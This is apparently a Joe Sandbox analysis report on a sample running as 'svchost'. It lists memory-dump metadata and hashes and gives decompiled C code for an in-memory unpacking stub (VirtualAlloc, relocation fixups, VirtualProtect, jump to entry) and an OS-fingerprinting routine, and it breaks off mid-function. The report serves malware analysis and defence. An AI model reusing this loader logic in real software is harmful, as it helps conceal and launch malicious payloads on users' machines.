    • MessageBoxA.USER32(00000000,?,004AD6F4,00000010), ref: 004200EE
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Message
    • String ID:
    • API String ID: 2030045667-0
    • Opcode ID: 12d9f0fa0f4d61877c44cb3c438c20c4769ac33533449eb6e3796f98d02c1afd
    • Instruction ID: 4c4e367f1f2bdc6f6658e74bc94b2b741ec6354742f1d2de641df68815ad4668
    • Opcode Fuzzy Hash: 12d9f0fa0f4d61877c44cb3c438c20c4769ac33533449eb6e3796f98d02c1afd
    • Instruction Fuzzy Hash: 78B012307843007BFD1087408E0AF1533549769F05F004411B249E44C1C5E0A840965D
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0050ABE6 Relevance: 1.3, APIs: 1, Instructions: 39memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 56%
    			E0050ABE6() {
				CHAR* _v8;
				intOrPtr _v20;
				intOrPtr* _v24;
				struct _STARTUPINFOA _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v807;
				char _v811;
				char _v815;
				intOrPtr _v819;
				char _v867;
				char _v875;
				char _v891;
				char _v915;
				char _v935;
				long _v943;
				char _v983;
				char _v999;
				long _t67;
				int _t70;
				unsigned int _t76;
				signed int _t88;
				void* _t98;
				long _t105;
				void* _t108;
				void* _t109;
				unsigned short _t111;
				unsigned short _t115;
				long* _t123;
				void* _t124;
				long _t126;
				void* _t127;
				long* _t128;
				void* _t129;
				intOrPtr* _t130;
				void* _t131;
				void* _t132;
				intOrPtr _t133;
				void* _t136;
				long _t138;
				intOrPtr* _t140;
				signed int _t144;
				unsigned int _t157;
				long _t158;
				char _t161;
				long* _t162;
				intOrPtr _t163;
				long _t166;
				void* _t168;
				long _t170;
				long _t172;
				void* _t173;
				void* _t174;
				long _t178;
				long _t180;
				intOrPtr* _t181;
				long _t185;
				DWORD* _t188;
				void* _t189;
				void* _t190;
				long _t192;
				long _t194;
				void* _t196;
				void* _t197;
				intOrPtr _t199;

				_pop(_t196);
				_t197 = _t196 - 7;
				_t1 =  &_v915; // 0x50a853
				_t181 = _t1;
				if( *_t181 == 0) {
					L10:
					 *_t181 = 1;
					_t16 =  &_v983; // 0xe6000000
					_t161 = _t197 -  *_t16;
					_v983 = _t161;
					_v935 = _v935 + _t161;
					_t20 =  &_v867; // 0x50a883
					 *_t20 =  *_t20 + _t161;
					asm("pushad");
					_t67 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
					__eflags = _t67;
					if(__eflags == 0) {
						L50:
						return _v807(0);
					} else {
						_v943 = _t67;
						L12();
						_pop(_t124);
						E0050AF13(__eflags, _t124 + 0x368, _t67);
						asm("popad");
						_t23 =  &_v999; // 0xe300000
						_t172 = _t197 +  *_t23;
						_t126 = _t172;
						__eflags =  *_t172;
						if( *_t172 != 0) {
							_t138 = 1;
							_t173 = _t172 +  *_t126;
							_t126 = _t126 + 4;
							__eflags = _t126;
							L15:
							__eflags =  *_t126;
							if( *_t126 != 0) {
								 *_t126 =  *_t126 + _t161;
								_t180 = _t173 +  *(_t126 + 4);
								__eflags = _t180;
								goto L17;
							}
						} else {
							_t180 = _t172 + 4;
							_t138 = 0;
							L17:
							_t25 =  &_v811; // 0x74
							_t26 =  &_v815; // 0x713a1074
							_t27 =  &_v943; // 0x40100000
							 *((intOrPtr*)( *_t27 + 0x5a9))( *_t26,  *_t25, _t138, _t180); // executed
							_pop(_t136);
							_pop(_t161);
							_t138 = _t126;
							_t173 = _t161;
							__eflags = _t138;
							if(_t138 != 0) {
								_t126 = _t136 + 8;
								goto L15;
							}
						}
						_t28 =  &_v943; // 0x40100000, executed
						_t70 = VirtualFree( *_t28, 0, 0x8000);
						_t30 =  &_v935; // 0x50a83f
						_t184 = _t30;
						_t31 =  &(_t184[2]); // 0x11e00
						_t32 =  &(_t184[4]); // 0x50a84f
						_t162 = _t32;
						_t185 =  *_t30;
						_t170 = _t185;
						__eflags =  *_t31;
						if( *_t31 != 0) {
							goto L20;
							do {
								do {
									L20:
									_t109 =  *_t170;
									_t170 = _t170 + 1;
									__eflags = _t109 - 0xe8 - 1;
								} while (_t109 - 0xe8 > 1);
								_t111 =  *_t170;
								__eflags = _t162[0];
								if(_t162[0] == 0) {
									_t133 =  *((intOrPtr*)(_t170 + 4));
									asm("rol eax, 0x10");
									_t115 = _t111;
								} else {
									goto L22;
								}
								L25:
								 *_t170 = _t115 - _t170 + _t185;
								_t170 = _t170 + 5;
								_t70 = _t133 - 0xe8;
								asm("loop 0xffffffc8");
								goto L26;
								L22:
								__eflags =  *_t170 -  *_t162;
							} while ( *_t170 !=  *_t162);
							_t133 =  *((intOrPtr*)(_t170 + 4));
							asm("rol eax, 0x10");
							_t115 = _t111 >> 8;
							goto L25;
						}
						L26:
						E0050AE69(_t70);
						_t39 =  &_v915; // 0x50a853
						_t140 = _t39;
						_t40 = _t140 + 8; // 0x0
						__eflags =  *_t40;
						if( *_t40 != 0) {
							_t41 = _t140 + 0x10; // 0x0
							_t192 = _t162 -  *_t41;
							__eflags = _t192;
							if(_t192 != 0) {
								 *(_t140 + 0x10) = _t192;
								_t43 =  &_v867; // 0x50a883
								_t194 =  *_t43;
								_t44 = _t194 - 4; // 0x489f5fc
								_t130 = _t44;
								__eflags =  *_t140 - 1;
								if( *_t140 == 1) {
									_t47 = _t140 + 8; // 0x0
									_t178 = _t194 +  *_t47;
									__eflags = _t178;
									_t48 = _t140 + 0x10; // 0x0
									_t157 =  *_t48;
								} else {
									_t45 = _t140 + 8; // 0x0
									_t178 = _t162 +  *_t45;
									_t46 = _t140 + 0x10; // 0x0
									_t157 =  *_t46;
								}
								while(1) {
									_t178 = _t178 + 1;
									_t104 = 0;
									__eflags = 0;
									if(0 == 0) {
										break;
									}
									__eflags = 0 - 0xef;
									if(0 > 0xef) {
										_t108 =  *_t178;
										_t178 = _t178 + 2;
										_t104 = _t108;
										__eflags = 0;
										if(0 == 0) {
											_t104 =  *_t178;
											_t178 = _t178 + 4;
										}
									}
									_t130 = _t130 + _t104;
									 *_t130 =  *_t130 + _t157;
								}
								_t131 = 0;
								_t170 = _t194;
								_t105 =  *_t178;
								__eflags = _t105;
								if(_t105 != 0) {
									while(1) {
										asm("lodsd");
										_t105 = _t105;
										__eflags = _t105;
										if(_t105 == 0) {
											break;
										}
										_t131 = _t131 + _t105;
										 *((intOrPtr*)(_t170 + _t131)) =  *((intOrPtr*)(_t170 + _t131)) + _t157;
									}
									_t132 = 0;
									_t158 = _t157 >> 0x10;
									__eflags = _t158;
									while(1) {
										asm("lodsd");
										_t105 = _t105;
										__eflags = _t105;
										if(_t105 == 0) {
											goto L42;
										}
										_t132 = _t132 + _t105;
										 *((intOrPtr*)(_t170 + _t132)) =  *((intOrPtr*)(_t170 + _t132)) + _t158;
									}
								}
							}
						}
						L42:
						_t54 =  &_v983; // 0x50a80f
						_t163 =  *_t54;
						_t55 =  &_v891; // 0x50a86b
						_t181 = _t55;
						__eflags =  *_t181 - 1;
						if( *_t181 != 1) {
							L45:
							_t127 = _t197;
							_t123 = _t127 - 0x21;
							__eflags =  *_t123;
							if( *_t123 != 0) {
								_t128 =  &(_t123[0]);
								_t60 =  &_v983; // 0x50a80f
								_t188 = _t60;
								_t166 =  *_t188;
								_push(_t188);
								_push(0);
								_t61 =  &(_t128[1]); // 0x200
								_t62 =  &(_t128[2]); // 0x163e000
								VirtualProtect( *_t62 + _t166,  *_t61,  *_t128, _t188);
								_t129 = _t166;
								_t181 = _t128;
								_t123 = _t129 + 0xc;
								asm("loop 0xffffffe3");
							}
							goto L47;
						} else {
							_t56 = _t181 + 4; // 0x1569c00
							_t168 = _t163 +  *_t56;
							_t98 = _v819(4, _t181, _t168, _t181);
							_t174 = _t168;
							_t189 = 0x100;
							__eflags = _t98 - 1;
							if(_t98 != 1) {
								goto L50;
							} else {
								_t190 = _t189 + 8;
								memcpy(_t174, _t190, 8);
								_t199 = _t199 + 0xc;
								_t181 = _t190 - 0xc;
								_t170 = _t190 + 0x10 - 8;
								__eflags = _t170;
								_v819(_t170, 0x100,  *((intOrPtr*)(_t181 - 4)), _t181);
								goto L45;
							}
						}
					}
				} else {
					_t15 =  &_v875; // 0x50a87b
					__eflags =  *_t15 - 1;
					if( *_t15 == 1) {
						L47:
						__eflags = 0;
						if(0 == 0) {
							asm("popad");
							asm("popfd");
							_push(_t197);
							_push(0xffffffff);
							_push(0x49d6f8);
							_push(E00472CF4);
							_push( *[fs:0x0]);
							 *[fs:0x0] = _t199;
							_push(_t123);
							_push(_t181);
							_push(_t170);
							_v20 = _t199 - 0x58;
							_t76 = GetVersion();
							 *0x4e1804 = 0;
							_t144 = _t76 & 0x000000ff;
							 *0x4e1800 = _t144;
							 *0x4e17fc = _t144 << 8;
							 *0x4e17f8 = _t76 >> 0x10;
							if(E00474E11(_t144 << 8, 1) == 0) {
								E0046FE89(0x1c);
							}
							if(E00474BCE() == 0) {
								E0046FE89(0x10);
							}
							_v8 = 0;
							E00474A12();
							 *0x4e2fe4 = GetCommandLineA();
							 *0x4e1770 = E004748E0();
							E00474693();
							E004745DA();
							E00473896();
							_v96.dwFlags = 0;
							GetStartupInfoA( &_v96);
							_v104 = E00474582();
							_t204 = _v96.dwFlags & 0x00000001;
							if((_v96.dwFlags & 0x00000001) == 0) {
								_t88 = 0xa;
							} else {
								_t88 = _v96.wShowWindow & 0x0000ffff;
							}
							_v100 = E00480D6E(GetModuleHandleA(0), 0, _v104, _t88);
							E004738C3(_t90);
							_v108 =  *((intOrPtr*)( *_v24));
							return E0047440A(_t170, _t204,  *((intOrPtr*)( *_v24)), _v24);
						} else {
							asm("popad");
							asm("popfd");
							return 1;
						}
					} else {
						goto L10;
					}
				}
			}





































































    0x0050abe6
    0x0050abec
    0x0050abee
    0x0050abee
    0x0050abf8
    0x0050ac0c
    0x0050ac0c
    0x0050ac11
    0x0050ac11
    0x0050ac17
    0x0050ac1d
    0x0050ac23
    0x0050ac29
    0x0050ac2b
    0x0050ac3a
    0x0050ac40
    0x0050ac42
    0x0050afb2
    0x0050afba
    0x0050ac48
    0x0050ac48
    0x0050ac4e
    0x0050ac53
    0x0050ac5d
    0x0050ac62
    0x0050ac67
    0x0050ac67
    0x0050ac6d
    0x0050ac6f
    0x0050ac72
    0x0050ac7e
    0x0050ac83
    0x0050ac85
    0x0050ac85
    0x0050ac88
    0x0050ac88
    0x0050ac8b
    0x0050ac8d
    0x0050ac91
    0x0050ac91
    0x00000000
    0x0050ac91
    0x0050ac74
    0x0050ac74
    0x0050ac77
    0x0050ac94
    0x0050ac98
    0x0050ac9e
    0x0050aca8
    0x0050acb3
    0x0050acb5
    0x0050acb6
    0x0050acb7
    0x0050acb8
    0x0050acb9
    0x0050acbc
    0x0050acbe
    0x00000000
    0x0050acbe
    0x0050acbc
    0x0050acca
    0x0050acd0
    0x0050acd6
    0x0050acd6
    0x0050acdc
    0x0050acdf
    0x0050acdf
    0x0050ace2
    0x0050ace4
    0x0050ace6
    0x0050ace9
    0x00000000
    0x0050aceb
    0x0050aceb
    0x0050aceb
    0x0050aceb
    0x0050aced
    0x0050acf0
    0x0050acf0
    0x0050acf4
    0x0050acf6
    0x0050acfa
    0x0050ad10
    0x0050ad15
    0x0050ad18
    0x00000000
    0x00000000
    0x00000000
    0x0050ad1a
    0x0050ad1e
    0x0050ad20
    0x0050ad26
    0x0050ad28
    0x00000000
    0x0050acfc
    0x0050acfe
    0x0050acfe
    0x0050ad02
    0x0050ad09
    0x0050ad0c
    0x00000000
    0x0050ad0c
    0x0050ad2a
    0x0050ad2a
    0x0050ad2f
    0x0050ad2f
    0x0050ad35
    0x0050ad38
    0x0050ad3b
    0x0050ad43
    0x0050ad43
    0x0050ad43
    0x0050ad46
    0x0050ad48
    0x0050ad4b
    0x0050ad51
    0x0050ad53
    0x0050ad53
    0x0050ad58
    0x0050ad5b
    0x0050ad69
    0x0050ad69
    0x0050ad69
    0x0050ad6c
    0x0050ad6c
    0x0050ad5d
    0x0050ad5f
    0x0050ad5f
    0x0050ad62
    0x0050ad62
    0x0050ad62
    0x0050ad6f
    0x0050ad73
    0x0050ad74
    0x0050ad74
    0x0050ad76
    0x00000000
    0x00000000
    0x0050ad78
    0x0050ad7a
    0x0050ad87
    0x0050ad8a
    0x0050ad8d
    0x0050ad8d
    0x0050ad8f
    0x0050ad91
    0x0050ad93
    0x0050ad93
    0x0050ad8f
    0x0050ad7c
    0x0050ad7e
    0x0050ad7e
    0x0050ad98
    0x0050ad9a
    0x0050ad9c
    0x0050ad9e
    0x0050ada1
    0x0050ada3
    0x0050ada3
    0x0050ada4
    0x0050ada4
    0x0050ada6
    0x00000000
    0x00000000
    0x0050ada8
    0x0050adaa
    0x0050adaa
    0x0050adb0
    0x0050adb2
    0x0050adb2
    0x0050adb5
    0x0050adb5
    0x0050adb6
    0x0050adb6
    0x0050adb8
    0x00000000
    0x00000000
    0x0050adba
    0x0050adbc
    0x0050adbc
    0x0050adb5
    0x0050ada1
    0x0050ad46
    0x0050adc2
    0x0050adc2
    0x0050adc8
    0x0050adca
    0x0050adca
    0x0050add2
    0x0050add4
    0x0050ae15
    0x0050ae16
    0x0050ae17
    0x0050ae21
    0x0050ae24
    0x0050ae26
    0x0050ae27
    0x0050ae27
    0x0050ae2d
    0x0050ae2f
    0x0050ae30
    0x0050ae36
    0x0050ae39
    0x0050ae3f
    0x0050ae46
    0x0050ae48
    0x0050ae49
    0x0050ae4c
    0x0050ae4c
    0x00000000
    0x0050add6
    0x0050add6
    0x0050add6
    0x0050ade4
    0x0050adea
    0x0050adeb
    0x0050adec
    0x0050adef
    0x00000000
    0x0050adf5
    0x0050adf5
    0x0050adfd
    0x0050adfd
    0x0050adff
    0x0050ae02
    0x0050ae02
    0x0050ae0f
    0x00000000
    0x0050ae0f
    0x0050adef
    0x0050add4
    0x0050abfa
    0x0050abfc
    0x0050ac04
    0x0050ac06
    0x0050ae4e
    0x0050ae53
    0x0050ae56
    0x0050ae62
    0x0050ae63
    0x0046fd5c
    0x0046fd5f
    0x0046fd61
    0x0046fd66
    0x0046fd71
    0x0046fd72
    0x0046fd7c
    0x0046fd7d
    0x0046fd7e
    0x0046fd7f
    0x0046fd82
    0x0046fd8c
    0x0046fd94
    0x0046fd9a
    0x0046fda5
    0x0046fdae
    0x0046fdbd
    0x0046fdc1
    0x0046fdc6
    0x0046fdce
    0x0046fdd2
    0x0046fdd7
    0x0046fdda
    0x0046fddd
    0x0046fde8
    0x0046fdf2
    0x0046fdf7
    0x0046fdfc
    0x0046fe01
    0x0046fe06
    0x0046fe0d
    0x0046fe18
    0x0046fe1b
    0x0046fe1f
    0x0046fe29
    0x0046fe21
    0x0046fe21
    0x0046fe21
    0x0046fe3c
    0x0046fe40
    0x0046fe4c
    0x0046fe58
    0x0050ae58
    0x0050ae58
    0x0050ae59
    0x0050ae5f
    0x0050ae5f
    0x00000000
    0x00000000
    0x00000000
    0x0050ac06

    APIs
    • VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 0050AC3A
    Memory Dump Source
    • Source File: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmpDownload File
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 7d0c79e5c64ec4ebc7937634463cb5eb04307ea62ad31df13ae4adec95eb8862
    • Instruction ID: 3453faa189d47162368fa6467a67e393af4c7c15636ca8a3e3639f76ed588913
    • Opcode Fuzzy Hash: 7d0c79e5c64ec4ebc7937634463cb5eb04307ea62ad31df13ae4adec95eb8862
    • Instruction Fuzzy Hash: 2B014B35E483588FEB334E288C047D9BB78BB41750F1440E9E6C8B62C5D6B5AFC18E55
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 00468E90 Relevance: 99.3, APIs: 2, Strings: 54, Instructions: 1347COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 69%
    			E00468E90(void* __ecx) {
				signed int __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t430;
				int _t433;
				int _t434;
				int _t443;
				signed int _t445;
				void* _t450;
				void* _t456;
				void* _t481;
				intOrPtr _t487;
				intOrPtr _t499;
				void* _t512;
				signed char _t515;
				signed int _t519;
				signed int _t522;
				signed int _t526;
				signed int _t529;
				void* _t551;
				intOrPtr _t553;
				intOrPtr* _t558;
				signed char _t564;
				signed int _t566;
				signed int _t584;
				signed int _t585;
				signed int _t587;
				signed int _t588;
				signed int _t609;
				signed int _t611;
				signed int _t614;
				int _t617;
				signed int _t620;
				signed int _t622;
				signed int _t625;
				signed int _t631;
				signed int _t633;
				signed int _t636;
				signed int _t642;
				signed int _t644;
				signed int _t647;
				signed int _t652;
				signed int _t654;
				signed int _t657;
				intOrPtr _t679;
				intOrPtr _t702;
				intOrPtr _t746;
				intOrPtr _t756;
				signed int _t823;
				void* _t828;
				void* _t829;
				void* _t830;
				void* _t831;
				void* _t832;
				void* _t837;
				intOrPtr _t838;
				signed int _t843;
				void* _t844;
				void* _t847;
				intOrPtr _t849;
				void* _t850;
				void* _t851;
				void* _t852;
				void* _t853;
				void* _t854;
				void* _t856;
				void* _t858;
				void* _t859;
				void* _t861;
				void* _t862;
				void* _t864;
				void* _t865;
				void* _t866;
				signed char _t894;

				_push(0xffffffff);
				_push(E004908CF);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t849;
				_t850 = _t849 - 0x394;
				_t847 = __ecx;
				memset(_t850 + 0x1e0, 0, 0x27 << 2);
				_t851 = _t850 + 0xc;
				 *(_t851 + 0x6c) = 0;
				 *((intOrPtr*)(_t851 + 0x1e4)) = 0x9c;
				if(GetVersionExA(_t851 + 0x1e0) != 0) {
					L2:
					_t430 =  *((intOrPtr*)(_t851 + 0x1f0));
					if(_t430 == 0) {
						E00483652(_t847 + 8, "Microsoft Win32s ");
						 *(_t847 + 4) = 3;
						L63:
						_t433 = memset(_t851 + 0x27c, 0, 0x4a << 2);
						_t852 = _t851 + 0xc;
						_t434 = memset(_t852 + 0x74, _t433, 0x19 << 2);
						_t853 = _t852 + 0xc;
						memset(_t853 + 0x18, _t434, 0x14 << 2);
						_t854 = _t853 + 0xc;
						E0046E080(_t854 + 0x10);
						_t736 = _t854 + 0x27c;
						 *((intOrPtr*)(_t854 + 0x3b0)) = 0xe;
						if(E0046E090(_t854 + 0x10, _t854 + 0x27c) == 0) {
							_push("Failed in call to GetOSVersion");
							_push(_t854 + 0x74);
							E0047262F(_t736);
							_t851 = _t854 + 8;
							E004833FF(_t847 + 0x10, _t851 + 0x74);
							E004833FF(_t847 + 0xc, "unknown");
							E004833FF(_t847 + 0x14, "unknown");
							_push("unknown");
							L164:
							_t442 = E004833FF(_t847 + 0x18);
							L165:
							 *(_t851 + 0x3ac) = 0xffffffff;
							_t443 = E0043E2B0(_t442);
							L166:
							 *[fs:0x0] =  *((intOrPtr*)(_t851 + 0x3a4));
							return _t443;
						}
						_t445 =  *((intOrPtr*)(_t854 + 0x31c)) - 1;
						if(_t445 > 4) {
							_t609 = _t854 + 0x18;
							_push("Unknown OS");
							_push(_t609);
							E0047262F(_t736);
							_t856 = _t854 + 8;
							asm("repne scasb");
							_t611 =  !(_t609 | 0xffffffff);
							_t828 = _t854 + 0x20 - _t611;
							_t584 = _t611;
							asm("repne scasb");
							_t614 = _t584 >> 2;
							memcpy(_t856 + 0x74 - 1, _t828, _t614 << 2);
							_t617 = _t584 & 0x00000003;
							__eflags = _t617;
							memcpy(_t828 + _t614 + _t614, _t828, _t617);
							_t858 = _t856 + 0x18;
							L157:
							_t450 = _t858 + 0x74;
							L158:
							E004833FF(_t847 + 0x10, _t450);
							L159:
							_t620 =  *(_t858 + 0x310);
							E0047262F(_t858 + 0x18, _t858 + 0x18, "%d.", _t620);
							_t859 = _t858 + 0xc;
							asm("repne scasb");
							_t622 =  !(_t620 | 0xffffffff);
							_t829 = _t858 + 0x24 - _t622;
							_t585 = _t622;
							asm("repne scasb");
							_t625 = _t585 >> 2;
							memcpy(_t859 + 0x74 - 1, _t829, _t625 << 2);
							_t456 = memcpy(_t829 + _t625 + _t625, _t829, _t585 & 0x00000003);
							_t861 = _t859 + 0x18;
							E004833FF(_t847 + 0x14, _t456);
							_t631 =  *(_t861 + 0x314);
							E0047262F(_t861 + 0x18, _t861 + 0x18, "%02d", _t631);
							_t862 = _t861 + 0xc;
							asm("repne scasb");
							_t633 =  !(_t631 | 0xffffffff);
							_t830 = _t861 + 0x24 - _t633;
							_t743 = _t633;
							asm("repne scasb");
							_t636 = _t743 >> 2;
							memcpy(_t862 + 0x74 - 1, _t830, _t636 << 2);
							memcpy(_t830 + _t636 + _t636, _t830, _t743 & 0x00000003);
							_t851 = _t862 + 0x18;
							E00483652(_t847 + 0x14, _t862 + 0x24);
							_t464 =  *((intOrPtr*)(_t851 + 0x318));
							if( *((intOrPtr*)(_t851 + 0x318)) != 0) {
								_t652 = _t851 + 0x1c;
								E0047262F(_t743, _t652, "%d", _t464);
								_t866 = _t851 + 0xc;
								asm("repne scasb");
								_t654 =  !(_t652 | 0xffffffff);
								_t743 = _t866 + 0x74;
								_t832 = _t851 + 0x24 - _t654;
								_t588 = _t654;
								asm("repne scasb");
								_t657 = _t588 >> 2;
								memcpy(_t866 + 0x74 - 1, _t832, _t657 << 2);
								memcpy(_t832 + _t657 + _t657, _t832, _t588 & 0x00000003);
								_t851 = _t866 + 0x18;
								E004833FF(_t847 + 0xc, _t866 + 0x24);
							}
							_t442 =  *(_t851 + 0x3a0);
							if( *(_t851 + 0x3a0) == 0) {
								goto L165;
							} else {
								_t642 = _t851 + 0x18;
								E0047262F(_t743, _t642, "Service Pack %d", _t442 & 0x0000ffff);
								_t864 = _t851 + 0xc;
								asm("repne scasb");
								_t644 =  !(_t642 | 0xffffffff);
								_t831 = _t851 + 0x24 - _t644;
								_t587 = _t644;
								asm("repne scasb");
								_t647 = _t587 >> 2;
								memcpy(_t864 + 0x74 - 1, _t831, _t647 << 2);
								_t865 = _t864 + 0xc;
								_push(_t865 + 0x18);
								memcpy(_t831 + _t647 + _t647, _t831, _t587 & 0x00000003);
								_t851 = _t865 + 0xc;
								goto L164;
							}
						}
						switch( *((intOrPtr*)(_t445 * 4 +  &M0046A1D4))) {
							case 0:
								_t663 = _t854 + 0x18;
								_push("DOS");
								_push(_t663);
								goto L85;
							case 1:
								__ecx = __esp + 0x18;
								_push("Windows");
								_push(__ecx);
								goto L85;
							case 2:
								__esp + 0x27c = __esp + 0x14;
								__eax = E0046E350(__esp + 0x27c);
								__eflags = __eax;
								if(__eax == 0) {
									__eax = __esp + 0x27c;
									__ecx = __esp + 0x10;
									__eax = E0046E390(__esp + 0x27c);
									__eflags = __eax;
									if(__eax == 0) {
										__edx = __esp + 0x27c;
										__ecx = __esp + 0x10;
										__eax = E0046E3D0(__edx);
										__eflags = __eax;
										if(__eax == 0) {
											__esp + 0x27c = __esp + 0x14;
											__eax = E0046E410(__esp + 0x27c);
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __esp + 0x27c;
												__ecx = __esp + 0x10;
												__eax = E0046E450(__esp + 0x27c);
												__eflags = __eax;
												if(__eax == 0) {
													__edx = __esp + 0x27c;
													__ecx = __esp + 0x10;
													__eax = E0046E490(__edx);
													__eflags = __eax;
													if(__eax == 0) {
														__esp + 0x27c = __esp + 0x14;
														__eax = E0046E4D0(__esp + 0x27c);
														__eflags = __eax;
														if(__eax == 0) {
															_push("Windows ??");
															L84:
															__eax = __esp + 0x1c;
															_push(__esp + 0x1c);
															goto L85;
														}
														__edx = __esp + 0x18;
														_push("Windows Millenium Edition");
														_push(__edx);
														goto L85;
													}
													_push("Windows 98 Second Edition");
													goto L84;
												}
												__ecx = __esp + 0x18;
												_push("Windows 98 SP1");
												_push(__ecx);
												goto L85;
											}
											__edx = __esp + 0x18;
											_push("Windows 98");
											_push(__edx);
											goto L85;
										}
										_push("Windows 95 OSR2");
										goto L84;
									}
									__ecx = __esp + 0x18;
									_push("Windows 95 SP1");
									_push(__ecx);
									goto L85;
								}
								__edx = __esp + 0x18;
								_push("Windows 95");
								_push(__edx);
								goto L85;
							case 3:
								__esp + 0x27c = __esp + 0x14;
								__eax = E0046E610(__esp + 0x27c);
								__eflags = __eax;
								if(__eax == 0) {
									__eax = __esp + 0x27c;
									__ecx = __esp + 0x10;
									__eax = E0046E500(__esp + 0x27c);
									__eflags = __eax;
									if(__eax == 0) {
										__eax = __esp + 0x27c;
										__ecx = __esp + 0x10;
										__eax = E0046E530(__esp + 0x27c);
										__eflags = __eax;
										if(__eax == 0) {
											__eax = __esp + 0x27c;
											__ecx = __esp + 0x10;
											__eax = E0046E560(__esp + 0x27c);
											__eflags = __eax;
											if(__eax == 0) {
												L154:
												__eflags =  *(__esp + 0x74);
												if( *(__esp + 0x74) == 0) {
													goto L159;
												}
												goto L157;
											}
											__ecx = __esp + 0x18;
											_push("Windows 2003");
											_push(__ecx);
											__eax = E0047262F(__edx);
											__edi = __esp + 0x20;
											__ecx = __ecx | 0xffffffff;
											__eax = 0;
											__esp = __esp + 8;
											asm("repne scasb");
											__ecx =  !__ecx;
											__edi = __edi - __ecx;
											__edx = __esp + 0x74;
											__esi = __edi;
											__ebx = __ecx;
											__edi = __edx;
											__ecx = __ecx | 0xffffffff;
											asm("repne scasb");
											__ecx = __ebx;
											__edi = __edx - 1;
											__ecx = __ebx >> 2;
											__eax = memcpy(__edx - 1, __esi, __ecx << 2);
											__edi = __esi + __ecx;
											__edi = __esi + __ecx + __ecx;
											0 = __ebx;
											__eax = __esp + 0x27c;
											__ecx = __ebx & 0x00000003;
											__eax = memcpy(__edi, __esi, __ecx);
											__esi + __ecx = __esi + __ecx + __ecx;
											__ecx = 0;
											__ecx = __esp + 0x14;
											__eflags = E0046E970(__esp + 0x14, __eflags, __esp + 0x27c);
											if(__eflags == 0) {
												__eax = __esp + 0x27c;
												__ecx = __esp + 0x10;
												__eflags = E0046E9A0(__esp + 0x10, __eflags, __esp + 0x27c);
												if(__eflags == 0) {
													__eax = __esp + 0x27c;
													__ecx = __esp + 0x10;
													__eflags = E0046E9F0(__esp + 0x10, __eflags, __esp + 0x27c);
													if(__eflags == 0) {
														__eax = __esp + 0x27c;
														__ecx = __esp + 0x10;
														__eflags = E0046EAA0(__esp + 0x10, __eflags, __esp + 0x27c);
														if(__eflags == 0) {
															L144:
															__eax = __esp + 0x27c;
															__ecx = __esp + 0x10;
															__eflags = E0046EA70(__esp + 0x10, __eflags, __esp + 0x27c);
															if(__eflags == 0) {
																__eax = __esp + 0x27c;
																__ecx = __esp + 0x10;
																__eax = E0046EA40(__esp + 0x10, __eflags, __esp + 0x27c);
																__eflags = __eax;
																if(__eax == 0) {
																	L149:
																	__eax = __esp + 0x27c;
																	__ecx = __esp + 0x10;
																	_push(__esp + 0x27c);
																	__eax = E0046E730();
																	__eflags = __eax;
																	if(__eax != 0) {
																		__ecx = __esp + 0x18;
																		_push(" Terminal Services");
																		_push(__ecx);
																		__eax = E0047262F(__edx);
																		__edi = __esp + 0x20;
																		__ecx = __ecx | 0xffffffff;
																		__eax = 0;
